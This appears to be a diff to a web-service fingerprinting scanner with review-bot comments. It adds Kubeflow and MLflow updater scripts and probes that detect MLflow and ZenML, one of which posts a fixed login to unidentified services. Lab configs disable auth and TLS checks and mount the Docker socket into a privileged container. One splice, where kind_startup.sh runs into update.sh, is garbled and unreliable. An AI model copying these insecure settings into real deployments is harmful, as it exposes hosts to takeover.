+ - kubeconfig:/root/.kube/
+ - lockconfig:/lockconfig
+ - ./kind_startup.sh:/src/startup.sh
+ entrypoint: /bin/sh -c "chmod +x /src/startup.sh && /src/startup.sh"
+ healthcheck:
+ test: ["CMD", "test", "-f", "/lockconfig/lock"]
+ interval: 30s
+ timeout: 10s
+ retries: 20
+ ports:
+ - "58080:58080"
+ environment:
+ - MODELS_WEB_APP_TAG=${MODELS_WEB_APP_TAG}
+
+ kubeflow:
+ image: kubeflow-models-ui:${MODELS_WEB_APP_TAG}
+ depends_on:
+ - kind
+ ports:
+ - "8080:5000"
+ volumes:
+ - kubeconfig:/root/.kube/
+ - lockconfig:/lockconfig
+ - ./app_startup.sh:/src/startup.sh
+ environment:
+ - APP_PREFIX=/
+ - APP_DISABLE_AUTH=True
+ - APP_SECURE_COOKIES=False
+
+ entrypoint: ["/bin/sh", "-c", "sleep 60 && chmod +x /src/startup.sh && /src/startup.sh"]
+volumes:
+ kubeconfig:
+ lockconfig:
diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/kind_startup.sh b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/kind_startup.sh
new file mode 100644
index 000000000..1eb52e7ef
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/kind_startup.sh
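Review bot: The `kind` service in kubeflow/app/docker-compose.yml combines `privileged: true` with a bind mount of `/var/run/docker.sock`, which gives that container control of the host's Docker daemon on top of nearly unrestricted access to host devices. kind creates its node containers through the socket, so `privileged: true` on this wrapper container is probably not needed; try removing it and keeping only the socket mount. If it does turn out to be required, add a comment above the key saying why, e.g. `# privileged is required because <reason>`, so the setting is not copied into other updaters by default.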
@@ -0,0 +1,51 @@ +#!/bin/sh + +export DOCKER_GATEWAY_IP=$(docker network inspect bridge --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}') +export KUBE_PROXY_PORT=58080 +export KUBECTL_INSECURE_SKIP_TLS_VERIFY=true + + +kubectl_proxy_on() { + kubectl config set-cluster proxy-cluster --server="http://${DOCKER_GATEWAY_IP}:${KUBE_PROXY_PORT}" + kubectl config set-context proxy-context --cluster=proxy-cluster --user=$(kubectl config view -o jsonpath='{.contexts[?(@.name == "'"$(kubectl config current-context)"'")].context.user}') + kubectl config use-context proxy-context + echo "Switched to use kubectl proxy" +} + +start_kubernetes_cluster() { + #delete if exists + kind delete cluster --name my-cluster + + #create cluster +cat </dev/null 2>&1 ; pwd -P)" +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +APP_PATH="${SCRIPT_PATH}/app" +TMP_DATA="/tmp/kubeflow_fingerprints" +GIT_REPO="${TMP_DATA}/repo" +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +BINPROTO="${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/kubeflow.binproto" + +mkdir -p "${FINGERPRINTS_PATH}" + + +removeCluster(){ + docker rmi -f kind_cluster:latest +} +buildCluster() { + pushd "${APP_PATH}" >/dev/null + docker build -t kind_cluster:latest -f Dockerfile.kind . + popd >/dev/null +} + +buildKubeFlowImage(){ + local version="$1" + pushd "${GIT_REPO}" >/dev/null + docker build -t kubeflow-models-ui:${version} -f Dockerfile . 
+ popd >/dev/null +} + +removeKubeFlowImage(){ + local version="$1" + docker rmi -f kubeflow-models-ui:${version} +} + +startKubeflow(){ + local version="$1" + pushd "${APP_PATH}" >/dev/null + MODELS_WEB_APP_TAG="${version}" docker-compose up -d + popd >/dev/null +} + +stopContainer(){ + local name="$1" + + CONTAINER_ID=$(docker ps | grep "${name}" | cut -d " " -f1) + if [ -n "$KUBEFLOW_CONTAINER" ]; then + docker stop $CONTAINER_ID + fi + +} + +stopKubeFlow(){ + local version="$1" + pushd "${APP_PATH}" >/dev/null + MODELS_WEB_APP_TAG="${version}" docker-compose down + stopContainer "kindest/node" + stopContainer "kubeflow-models-ui:${version}" + stopContainer "kind_cluster" + + popd >/dev/null +} + +waitForServer() { + local url="http://localhost:8080" + local wait_time="${2:-5}" + + echo "Waiting for server at $url to be available..." + + while true; do + http_response=$(curl --write-out "%{http_code}" --silent --output /dev/null "$url" || echo "failed") + if [ "$http_response" -eq 200 ]; then + echo "Server is up and running at $url!" + break + elif [ "$http_response" = "failed" ]; then + echo "Curl command failed. Waiting for $wait_time seconds before retrying..." + else + echo "Server not yet available (HTTP status: $http_response). Waiting for $wait_time seconds..." + fi + sleep "$wait_time" + done +} + + +#Build kuberentes cluster +buildCluster + +# Convert existing data file to a human-readable JSON file +convertFingerprint "${BINPROTO}" "${JSON_DATA}" + +# Clone Kubeflow Models UI repository if not already present +if [[ ! -d "${GIT_REPO}" ]]; then + git clone https://github.com/kserve/models-web-app.git "${GIT_REPO}" +fi + + +# Read all versions to be fingerprinted +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" + +# Update fingerprints for all listed versions +for app_version in "${ALL_VERSIONS[@]}"; do + echo "Fingerprinting Kubeflow Models UI version ${app_version} ..." 
+ + # Checkout the repository to the correct tag + checkOutRepo "${GIT_REPO}" "v${app_version}" + + # Build and run the container + buildKubeFlowImage "${app_version}" + + # Start the cluser and kubeflow + startKubeflow "${app_version}" + + echo "Waiting for Kubeflow ${app_version} to be ready ..." + sleep 60 + + # Wait for the container to be fully up + waitForServer + + echo "Application is up, updating fingerprint." + + # Capture the fingerprints + updateFingerprint \ + "kubeflow" \ + "${app_version}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}" \ + "http://localhost:8080" + + # Stop and remove the container + stopKubeFlow "${app_version}" + + removeKubeFlowImage "${app_version}" + +done + +removeCluster + +# Convert the updated JSON data to binary proto format +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Kubeflow Models UI. Please commit the following file:" +echo " ${BIN_DATA}" +echo "to" +echo " ${BINPROTO}" diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/versions.txt b/google/fingerprinters/web/scripts/updater/community/kubeflow/versions.txt new file mode 100644 index 000000000..527d9f1bd --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/versions.txt @@ -0,0 +1,5 @@ +0.7.0 +0.8.0 +0.9.0 +0.10.0 +0.13.0-rc.0 diff --git a/google/fingerprinters/web/scripts/updater/community/mlflow/app/docker-compose.yaml b/google/fingerprinters/web/scripts/updater/community/mlflow/app/docker-compose.yaml new file mode 100644 index 000000000..ca5931215 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/mlflow/app/docker-compose.yaml @@ -0,0 +1,7 @@ +version: '2' +services: + mlflow: + image: ghcr.io/mlflow/mlflow:${MLFLOW_VERSION} + ports: + - "5000:5000" + command: sh -c "mlflow server --host 0.0.0.0 --port 5000" 
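Review bot: In `stopContainer` of kubeflow/update.sh the guard tests `$KUBEFLOW_CONTAINER`, which is not assigned anywhere in the visible script, so `docker stop` is never reached and the `kindest/node` container created by kind keeps running after `docker-compose down`. The test should use the variable set on the line above it: `if [ -n "${CONTAINER_ID}" ]; then docker stop ${CONTAINER_ID}; fi`, with `local CONTAINER_ID` so it does not leak into global scope. `waitForServer` also loops without limit when the app never returns 200; a retry cap would make the run fail instead of hang. The top of this script is damaged in this view, so anything defined there could not be checked.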
diff --git a/google/fingerprinters/web/scripts/updater/community/mlflow/update.sh b/google/fingerprinters/web/scripts/updater/community/mlflow/update.sh
new file mode 100755
index 000000000..2f16abe5c
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/mlflow/update.sh
@@ -0,0 +1,97 @@ +#!/usr/bin/env bash + +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of MLflow. +APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/mlflow_fingerprints" +# Path to the local git repository for MLflow codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +# Read all the versions to be fingerprinted. 
+readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" + +mkdir -p "${FINGERPRINTS_PATH}" + +BINPROTO="${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/mlflow.binproto" + +StartMLflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + MLFLOW_VERSION="${version}" docker-compose up -d + popd >/dev/null +} + +StopMLflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + MLFLOW_VERSION="${version}" docker-compose down --volumes --remove-orphans + popd >/dev/null +} + +CreateFingerprintForMLflow() { + local mlflowVersion="$1" + + echo "Fingerprinting MLflow version ${mlflowVersion} ..." + # Start a live instance of MLflow. + StartMLflow "${mlflowVersion}" + + # Arbitrarily chosen so that MLflow is up and running. + echo "Waiting for MLflow ${mlflowVersion} to be ready ..." + sleep 20 + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "${mlflowVersion}" + + updateFingerprint \ + "mlflow" \ + "${mlflowVersion}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}/mlflow" \ + "http://localhost:5000" + + # Stop the live instance of MLflow. + StopMLflow "${mlflowVersion}" +} + +# Fetch MLflow codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/mlflow/mlflow "${GIT_REPO}" +fi + +# Get versions +for mlflow_version in "${ALL_VERSIONS[@]}"; do + CreateFingerprintForMLflow "${mlflow_version}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for MLflow. Please commit the following file:" +echo " ${BIN_DATA}" +echo "to" +echo " ${BINPROTO}" diff --git a/google/fingerprinters/web/scripts/updater/community/mlflow/versions.txt b/google/fingerprinters/web/scripts/updater/community/mlflow/versions.txt new file mode 100644 index 000000000..850333570 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/mlflow/versions.txt 
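Review bot: `BINPROTO` is defined in mlflow/update.sh but only used in the final `echo`; unlike the flyte, gradio and kubeflow updaters in this commit, the script never runs `convertFingerprint "${BINPROTO}" "${JSON_DATA}"` before the version loop. How `updateFingerprint` and the closing `convertFingerprint "${JSON_DATA}" "${BIN_DATA}"` behave without a seeded JSON file is decided in common.sh, which is not shown here, but the likely outcome is that previously committed MLflow fingerprints are not carried into the new file. Add the conversion step before the clone, as the sibling scripts do.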
@@ -0,0 +1,30 @@
+v1.30.0
+v2.0.0rc0
+v2.0.0
+v2.0.1
+v2.1.0
+v2.1.1
+v2.2.0
+v2.2.1
+v2.2.2
+v2.3.0
+v2.3.1
+v2.3.2
+v2.4.0
+v2.4.1
+v2.4.2
+v2.5.0
+v2.6.0
+v2.7.0
+v2.7.1
+v2.8.1
+v2.9.0
+v2.9.1
+v2.9.2
+v2.10.0
+v2.10.1
+v2.10.2
+v2.11.0
+v2.11.1
+v2.11.2
+v2.11.3
diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java
index b6430a19d..4200c7b14 100644
--- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java
+++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java
@@ -18,16 +18,24 @@ import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; import static com.google.common.collect.ImmutableSet.toImmutableSet; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; import static java.util.stream.Collectors.joining; import com.google.common.collect.ImmutableMap; import com.google.common.collect.ImmutableSet; import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.tsunami.common.data.NetworkEndpointUtils; import com.google.tsunami.common.data.NetworkServiceUtils; -import com.google.tsunami.plugin.PluginType; -import com.google.tsunami.plugin.ServiceFingerprinter; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; import com.google.tsunami.plugin.annotations.ForWebService; import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.ServiceFingerprinter; import com.google.tsunami.plugins.fingerprinters.web.crawl.Crawler; import com.google.tsunami.plugins.fingerprinters.web.crawl.ScopeUtils; import com.google.tsunami.plugins.fingerprinters.web.data.FingerprintData; @@ -36,6 +44,7 @@ import com.google.tsunami.plugins.fingerprinters.web.detection.SoftwareDetector.DetectedSoftware; import com.google.tsunami.plugins.fingerprinters.web.detection.VersionDetector; import com.google.tsunami.plugins.fingerprinters.web.detection.VersionDetector.DetectedVersion; +import com.google.tsunami.plugins.fingerprinters.web.proto.SoftwareIdentity; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.FingerprintingReport; 
@@ -47,8 +56,11 @@ import com.google.tsunami.proto.Version.VersionType; import com.google.tsunami.proto.VersionSet; import com.google.tsunami.proto.WebServiceContext; +import java.io.IOException; import java.util.Collection; +import java.util.HashSet; import java.util.Optional; +import java.util.Set; import javax.inject.Inject; /** A {@link ServiceFingerprinter} plugin that fingerprints web applications. */ @@ -69,6 +81,7 @@ public final class WebServiceFingerprinter implements ServiceFingerprinter { private final SoftwareDetector softwareDetector; private final VersionDetector.Factory versionDetectorFactory; private final WebServiceFingerprinterConfigs configs; + private final HttpClient httpClient; @Inject WebServiceFingerprinter( @@ -76,12 +89,14 @@ public final class WebServiceFingerprinter implements ServiceFingerprinter { Crawler crawler, SoftwareDetector softwareDetector, VersionDetector.Factory versionDetectorFactory, - WebServiceFingerprinterConfigs configs) { + WebServiceFingerprinterConfigs configs, + HttpClient httpClient) { this.fingerprintRegistry = checkNotNull(fingerprintRegistry); this.crawler = checkNotNull(crawler); this.softwareDetector = checkNotNull(softwareDetector); this.versionDetectorFactory = checkNotNull(versionDetectorFactory); this.configs = checkNotNull(configs); + this.httpClient = checkNotNull(httpClient); } @Override 
@@ -119,16 +134,11 @@ public FingerprintingReport fingerprint(TargetInfo targetInfo, NetworkService ne if (versionsBySoftware.isEmpty()) { logger.atInfo().log( - "WebServiceFingerprinter failed to confirm running web application on '%s'.", + "WebServiceFingerprinter failed to confirm running web application on '%s' using existing" + + " hashes. Try custom heuristics instead", startingUrl); - return FingerprintingReport.newBuilder() - .addNetworkServices( - addWebServiceContext( - networkService, - Optional.empty(), - Optional.empty(), - crawlResultsUnderRecordingLimit)) - .build(); + return fingerprintWithCustomHeuristics( + networkService, startingUrl, crawlResultsUnderRecordingLimit); } else { logger.atInfo().log( "WebServiceFingerprinter identified %d results for '%s'.", 
@@ -148,6 +158,48 @@ public FingerprintingReport fingerprint(TargetInfo targetInfo, NetworkService ne } } + private FingerprintingReport fingerprintWithCustomHeuristics( + NetworkService networkService, String startingUrl, ImmutableSet crawlResults) { + ImmutableSet detectedSoftware = + detectSoftwareByCustomHeuristics(networkService, startingUrl); + + if (detectedSoftware.isEmpty()) { + logger.atInfo().log( + "WebServiceFingerprinter failed to confirm running web application on '%s' using custom" + + " heuristics either.", + startingUrl); + return FingerprintingReport.newBuilder() + .addNetworkServices( + addWebServiceContext( + networkService, Optional.empty(), Optional.empty(), crawlResults)) + .build(); + } + + logger.atInfo().log( + "WebServiceFingerprinter discovered %d potential applications for '%s': [%s] using custom" + + " heuristics.", + detectedSoftware.size(), + startingUrl, + detectedSoftware.stream() + .map(software -> software.softwareIdentity().getSoftware()) + .collect(joining(","))); + return FingerprintingReport.newBuilder() + .addAllNetworkServices( + detectedSoftware.stream() + .map( + software -> + addWebServiceContext( + // Overwrite service name + networkService.toBuilder() + .setServiceName(software.softwareIdentity().getSoftware()) + .build(), + Optional.of(software), + Optional.empty(), + crawlResults)) + .collect(toImmutableList())) + .build(); + } + private ImmutableMap detectSoftwareVersions( Collection detectedSoftware, NetworkService networkService) { ImmutableMap.Builder versionsBySoftwareBuilder = 
@@ -222,4 +274,104 @@ private ImmutableSet crawlNetworkService( .build(); return crawler.crawl(crawlConfig); } + + private ImmutableSet detectSoftwareByCustomHeuristics( + NetworkService networkService, String startingUrl) { + HashSet detectedSoftware = new HashSet<>(); + + checkForMlflow(detectedSoftware, networkService, startingUrl); + checkForZenMl(detectedSoftware, networkService, startingUrl); + return ImmutableSet.copyOf(detectedSoftware); + } + + private void checkForMlflow( + Set software, NetworkService networkService, String startingUrl) { + logger.atInfo().log("probing Mlflow ping - custom fingerprint phase"); + + // We want to test weak credentials against mlflow versions above 2.5 which has basic + // authentication module.these versions return a 401 status code and a link to documentation + // about how to authenticate. + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var pingApiUrl = String.format("http://%s/%s", uriAuthority, "ping"); + try { + HttpResponse apiPingResponse = httpClient.send(get(pingApiUrl).withEmptyHeaders().build()); + + if (apiPingResponse.status() != HttpStatus.UNAUTHORIZED + || apiPingResponse.bodyString().isEmpty()) { + return; + } + + if (apiPingResponse + .bodyString() + .get() + .contains( + "You are not authenticated. 
Please see " + + "https://www.mlflow.org/docs/latest/auth/index.html" + + "#authenticating-to-mlflow " + + "on how to authenticate")) { + software.add( + DetectedSoftware.builder() + .setSoftwareIdentity(SoftwareIdentity.newBuilder().setSoftware("mlflow").build()) + .setRootPath(startingUrl) + .setContentHashes(ImmutableMap.of()) + .build()); + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", pingApiUrl); + } + } + + private void checkForZenMl( + Set software, NetworkService networkService, String startingUrl) { + logger.atInfo().log("probing ZenMl login page and login api - custom fingerprint phase"); + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + + // we double-check both the api and login page + var loginApiUrl = String.format("http://%s/%s", uriAuthority, "api/v1/login"); + try { + // test login api with a random username and password and for sure not exist + HttpResponse apiLoginResponse = + httpClient.send( + post(loginApiUrl) + .setHeaders( + HttpHeaders.builder() + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build()) + .setRequestBody( + ByteString.copyFromUtf8( + "username=aHkPdMlQoWjRtBnX&password=aHkPdMlQoWjRtBnX")) + .build()); + + if (!(apiLoginResponse.status() == HttpStatus.UNAUTHORIZED + && apiLoginResponse.bodyString().isPresent() + && apiLoginResponse + .bodyString() + .get() + .equals( + "{\"detail\":[\"AuthorizationException\"," + + "\"Authentication error: invalid username or password\"]}"))) { + return; + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", loginApiUrl); + return; + } + + var loginUrl = String.format("http://%s/%s", uriAuthority, "login"); + try { + HttpResponse loginPageResponse = httpClient.send(get(loginUrl).withEmptyHeaders().build()); + if (!(loginPageResponse.bodyString().isPresent() + && loginPageResponse.bodyString().get().contains("ZenML Dashboard"))) { + return; 
+ } + software.add( + DetectedSoftware.builder() + .setSoftwareIdentity(SoftwareIdentity.newBuilder().setSoftware("zenml").build()) + .setRootPath(startingUrl) + .setContentHashes(ImmutableMap.of()) + .build()); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", loginUrl); + } + } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java index cd431fee8..ce76612e5 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java @@ -33,8 +33,10 @@ public final class WebServiceFingerprinterConfigs { private static final ImmutableList DEFAULT_FILE_EXTENSION_EXCLUSIONS = ImmutableList.of("application/zip", "application/gzip"); - private final WebServiceFingerprinterCliOptions cliOptions; - private final WebServiceFingerprinterConfigProperties configProperties; + private static final ImmutableList DEFAULT_PATH_EXCLUSIONS = ImmutableList.of(); + + final WebServiceFingerprinterCliOptions cliOptions; + final WebServiceFingerprinterConfigProperties configProperties; @Inject WebServiceFingerprinterConfigs( 
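Review bot: `checkForMlflow` and `checkForZenMl` build their probe URLs with a hard-coded `http://%s/%s` from the endpoint authority, so a service that was crawled over HTTPS or under a non-root application path is probed with the wrong scheme and path and never matches. Deriving the URLs from the same root the crawler used, e.g. `var pingApiUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "ping";` (and likewise for `api/v1/login` and `login`), keeps the two in step. These probes, including a login POST with the fixed value `aHkPdMlQoWjRtBnX`, now go to every web service the hash-based detection could not identify. The inline comment calls that credential random, but it is a constant, so the comment should say so, and a config switch to turn the custom heuristics off would be worth adding.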
@@ -95,8 +97,19 @@ public List getContentTypeExclusions() { } } + public List getPathExclusions() { + if (cliOptions.pathExclusions != null) { + return cliOptions.pathExclusions; + } else if (configProperties.pathExclusions != null) { + return configProperties.pathExclusions; + } else { + return DEFAULT_PATH_EXCLUSIONS; + } + } + + /** CLI options for {@link WebServiceFingerprinter}. */ @Parameters(separators = "=") - static final class WebServiceFingerprinterCliOptions implements CliOption { + public static final class WebServiceFingerprinterCliOptions implements CliOption { @Parameter( names = "--web-service-fingerprinter-enforce-crawling-scope-check", @@ -148,12 +161,18 @@ static final class WebServiceFingerprinterCliOptions implements CliOption { + "purpose.") List contentTypeExclusions; + @Parameter( + names = "--web-service-fingerprinter-crawl-path-exclusions", + description = "A comma separated list of path regexes to exclude during crawling.") + List pathExclusions; + @Override public void validate() {} } + /** Config properties for {@link WebServiceFingerprinter}. */ @ConfigProperties("plugins.google.fingerprinter.web") - static final class WebServiceFingerprinterConfigProperties { + public static final class WebServiceFingerprinterConfigProperties { /** * Configuration options for the {@code @@ -186,5 +205,11 @@ static final class WebServiceFingerprinterConfigProperties { * CLI flag's description for more details. */ List contentTypeExclusions; + + /** + * Configuration option for the @code --web-service-fingerprinter-crawl-path-exclusions} CLI + * flag. See the CLI flag's description for more details. + */ + List pathExclusions; } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java index 9e5c12838..20c5029d8 100644 
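Review bot: The new `--web-service-fingerprinter-crawl-path-exclusions` option in the `@@ -148,12 +161,18 @@` hunk is never checked, because `validate()` directly below it stays empty. The strings are compiled only later in `CrawlConfigUtils.isCrawlTargetInBlockList`, so a malformed regex would surface as a `PatternSyntaxException` in the middle of a crawl instead of at startup. Compiling each entry in `validate()` behind a null check, e.g. `pathExclusions.forEach(Pattern::compile);`, and failing with a clear message would catch this early; the config-file property added in the `@@ -186,5 +205,11 @@` hunk needs the same check wherever properties are validated. Since the description says the list is comma separated, it should also state that a single regex cannot contain a comma, otherwise a quantifier such as `{1,3}` would be cut in two.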
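Review bot: The Javadoc added for `pathExclusions` in the `@@ -186,5 +205,11 @@` hunk has a broken inline tag: `@code --web-service-fingerprinter-crawl-path-exclusions}` is missing its opening brace, so the tag will not render as code. It should read `{@code --web-service-fingerprinter-crawl-path-exclusions}`. The comment could also say that the CLI flag takes precedence when both are set, which is what `getPathExclusions()` implements.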
--- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java @@ -19,6 +19,8 @@ import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlTarget; +import java.util.List; +import java.util.regex.Pattern; /** Static utility methods pertaining to {@link CrawlConfig} proto buffer. */ final class CrawlConfigUtils { @@ -41,4 +43,13 @@ static boolean isCrawlTargetInScope(CrawlConfig crawlConfig, CrawlTarget crawlTa return !crawlConfig.getShouldEnforceScopeCheck() || crawlConfig.getScopesList().stream() .anyMatch(scope -> ScopeUtils.isInScope(scope, crawlTarget.getUrl())); } + + static boolean isCrawlTargetInBlockList(CrawlTarget crawlTarget, List pathExclusions) { + for (String regex : pathExclusions) { + if (Pattern.compile(regex).matcher(crawlTarget.getUrl()).find()) { + return true; + } + } + return false; + } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java index b4546a744..5c087d8a3 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java @@ -28,6 +28,7 @@ import com.google.tsunami.common.net.http.HttpMethod; import com.google.tsunami.common.net.http.HttpRequest; import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.CrawlTarget; 
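Review bot: `isCrawlTargetInBlockList` calls `Pattern.compile(regex)` for every exclusion on every candidate link, and runs `find()` over the whole URL although the option is documented as a list of path regexes. Recompiling is wasted work inside the crawl loop, and an unanchored match on the full URL lets a pattern hit the host or query string, so the set of skipped links can differ from what the operator meant to exclude. The URLs being matched appear to come from pages served by the scanned service, so a backtracking-heavy exclusion regex is evaluated on input the target controls. Compile the list once when the config is resolved and pass `List<Pattern>` here, and match on the path component only, e.g. `pattern.matcher(URI.create(url).getPath()).find()` with handling for URLs that do not parse. The method also lacks Javadoc; `/** Returns true if the target URL matches any of the exclusion regexes. */` would do.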
@@ -62,18 +63,21 @@ final class SimpleCrawlAction extends RecursiveAction { private final CrawlConfig crawlConfig; private final CrawlTarget crawlTarget; private final SimpleCrawlerResults crawlerResults; + private final WebServiceFingerprinterConfigs configs; SimpleCrawlAction( int currentDepth, HttpClient httpClient, CrawlConfig crawlConfig, CrawlTarget crawlTarget, - SimpleCrawlerResults crawlerResults) { + SimpleCrawlerResults crawlerResults, + WebServiceFingerprinterConfigs configs) { this.currentDepth = currentDepth; this.httpClient = checkNotNull(httpClient); this.crawlConfig = checkNotNull(crawlConfig); this.crawlTarget = checkNotNull(crawlTarget); this.crawlerResults = checkNotNull(crawlerResults); + this.configs = checkNotNull(configs); } String getTargetUrl() { @@ -153,6 +157,10 @@ private void spawnNewCrawlActions(HttpResponse httpResponse) { .map(crawlTarget -> normalizeHost(crawlConfig, crawlTarget)) // Ignore out-of-scope URLs. .filter(crawlTarget -> CrawlConfigUtils.isCrawlTargetInScope(crawlConfig, crawlTarget)) + .filter( + crawlTarget -> + !CrawlConfigUtils.isCrawlTargetInBlockList( + crawlTarget, configs.getPathExclusions())) .map(this::newCrawlAction) .collect(toImmutableSet()); invokeAll(newCrawlActions); @@ -166,6 +174,6 @@ private static boolean isValidCrawlTarget(CrawlTarget crawlTarget) { private SimpleCrawlAction newCrawlAction(CrawlTarget newCrawlTarget) { return new SimpleCrawlAction( - currentDepth + 1, httpClient, crawlConfig, newCrawlTarget, crawlerResults); + currentDepth + 1, httpClient, crawlConfig, newCrawlTarget, crawlerResults, configs); } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java index c5ec5a4d8..4883a0eea 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java 
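Review bot: The exclusion filter added in `spawnNewCrawlActions` (the `@@ -153,6 +157,10 @@` hunk) has no comment, unlike the `// Ignore out-of-scope URLs.` line above the scope filter; add `// Ignore URLs matching an operator-configured path exclusion.` above it. It also calls `configs.getPathExclusions()` once per candidate link, and the constructor hunk stores the whole `WebServiceFingerprinterConfigs` only for that call. Resolving the list once in the constructor, `this.pathExclusions = checkNotNull(configs).getPathExclusions();`, and passing that list on in `newCrawlAction` would keep the action from depending on the full config object. The body of `spawnNewCrawlActions` starts outside the hunk, so whether other code paths create crawl targets without this filter cannot be seen here.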
